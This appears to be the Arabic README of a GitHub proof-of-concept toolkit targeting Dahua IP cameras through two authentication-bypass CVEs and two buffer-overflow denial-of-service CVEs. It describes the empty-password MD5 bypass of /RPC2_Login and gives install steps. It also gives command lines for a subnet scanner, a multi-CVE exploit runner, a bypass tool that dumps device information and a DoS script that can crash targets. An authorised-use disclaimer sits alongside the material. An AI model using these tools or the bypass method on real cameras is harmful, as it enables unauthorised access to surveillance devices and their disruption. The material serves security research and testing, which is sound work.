
أداة بحث CVE لكاميرا IP من داهوا (CVE-2021-33044/33045, CVE-2025-31700/31701)
⚠️ قيد التطوير — تعتمد هذه البرامج النصية على تفاصيل CVE المنشورة وتتطلب اختبارات إضافية على الأجهزة الضعيفة لتأكيد الوظائف الكاملة.
برامج بحثية وإثبات مفهوم لأربع ثغرات حرجة في كاميرات IP من Dahua.
يتم توفير هذا البرنامج لأغراض تعليمية واختبار أمني مصرح به فقط.
باستخدام هذه الأدوات، فإنك توافق على أن:
1. لديك إذن كتابي صريح لاختبار الأنظمة المستهدفة
2. لن تستخدم هذه الأدوات في أنشطة غير قانونية
3. تتحمل المسؤولية الكاملة عن أفعالك
4. المؤلفون غير مسؤولين عن أي سوء استخدام أو ضرر
الوصول غير المصرح به إلى أنظمة الكمبيوتر هو جريمة جنائية في معظم الدول.
| CVE | CVSS | النوع | الحالة |
|---|---|---|---|
| CVE-2021-33044 | 9.8 حرج | تجاوز المصادقة | CISA KEV (مُستغل بنشاط) |
| CVE-2021-33045 | 9.8 حرج | تجاوز المصادقة | CISA KEV (مُستغل بنشاط) |
| CVE-2025-31700 | 8.1 عالي | تجاوز سعة المخزن المؤقت DoS | حديث (2025) |
| CVE-2025-31701 | 8.1 عالي | تجاوز سعة المخزن المؤقت DoS | حديث (2025) |
تستخدم كاميرات Dahua مصادقة التحدي والاستجابة عبر /RPC2_Login:
تسجيل الدخول العادي:
step1 = MD5("admin:realm:PASSWORD")
step2 = MD5("step1:random:step1")
التجاوز (CVE-2021-33044/45):
step1 = MD5("admin:realm:") ← كلمة مرور فارغة
step2 = MD5("step1:random:step1")
البرامج الثابتة الضعيفة تقبل هاش كلمة المرور الفارغة وتعيد رمز جلسة صالحًا.
| الملف | الغرض | CVEs |
|---|---|---|
dahua_scanner.py | اكتشاف الشبكة — العثور على كاميرات Dahua في الشبكة الفرعية | اكتشاف |
dahua_exploit.py | ماسح متعدد الثغرات — اختبار جميع الثغرات | الكل |
dahua_auth_bypass.py | تجاوز مصادقة مخصص مع خيار --dump | CVE-2021-33044/45 |
dahua_rce.py | اختبار تجاوز سعة المخزن المؤقت DoS | CVE-2025-31700/01 |
# استنساخ المستودع
git clone https://github.com/umair-aziz025/Dahua_IP_Camera_CVE_Exploit.git
cd Dahua_IP_Camera_CVE_Exploit
# تثبيت التبعيات
pip install requests
# مسح الشبكة الفرعية (المنافذ مطلوبة)
python dahua_scanner.py 192.168.1.0/24 -p 80 8080 8081
# مضيف فردي مع منفذ
python dahua_scanner.py 192.168.1.100:8081
# خيارات كاملة
python dahua_scanner.py 192.168.1.0/24 -p 80 8080 -w 100 -t 10 -v -o results.json
# عرض المساعدة
python dahua_scanner.py --help
المنافذ الشائعة لـ Dahua: 80, 8000, 8080, 8081, 8888, 9000, 443, 37777
python dahua_exploit.py 192.168.1.100 -p 8081
python dahua_exploit.py 192.168.1.100 -c 2021-33044 # ثغرة واحدة
python dahua_exploit.py --help
python dahua_auth_bypass.py 192.168.1.100 -p 8081
python dahua_auth_bypass.py 192.168.1.100 --dump # تفريغ معلومات الجهاز بعد التجاوز
python dahua_rce.py 192.168.1.100 -p 8081
python dahua_rce.py 192.168.1.100 --cve http # HTTP فقط
python dahua_rce.py 192.168.1.100 --cve tcp # TCP/37777 فقط
⚠️ تحذير: قد يؤدي برنامج DoS النصي إلى تعطل الجهاز المستهدف.
requests
جميع الاستيرادات الأخرى من مكتبة Python القياسية:
socket, struct, hashlib, threading, ipaddress, argparse, json
🚧 قيد التطوير النشط
تم تطوير هذه البرامج النصية بناءً على:
حالة الاختبار:
إذا كان لديك إمكانية الوصول إلى أجهزة ضعيفة للاختبار، فالمساهمات والملاحظات مرحب بها.
يرجى الإبلاغ عن أي مشكلات أو إيجابيات خاطئة.
رخصة MIT - انظر ملف LICENSE.
Umair Aziz
GitHub: @umair-aziz025
لأغراض تعليمية وبحث أمني مصرح به فقط.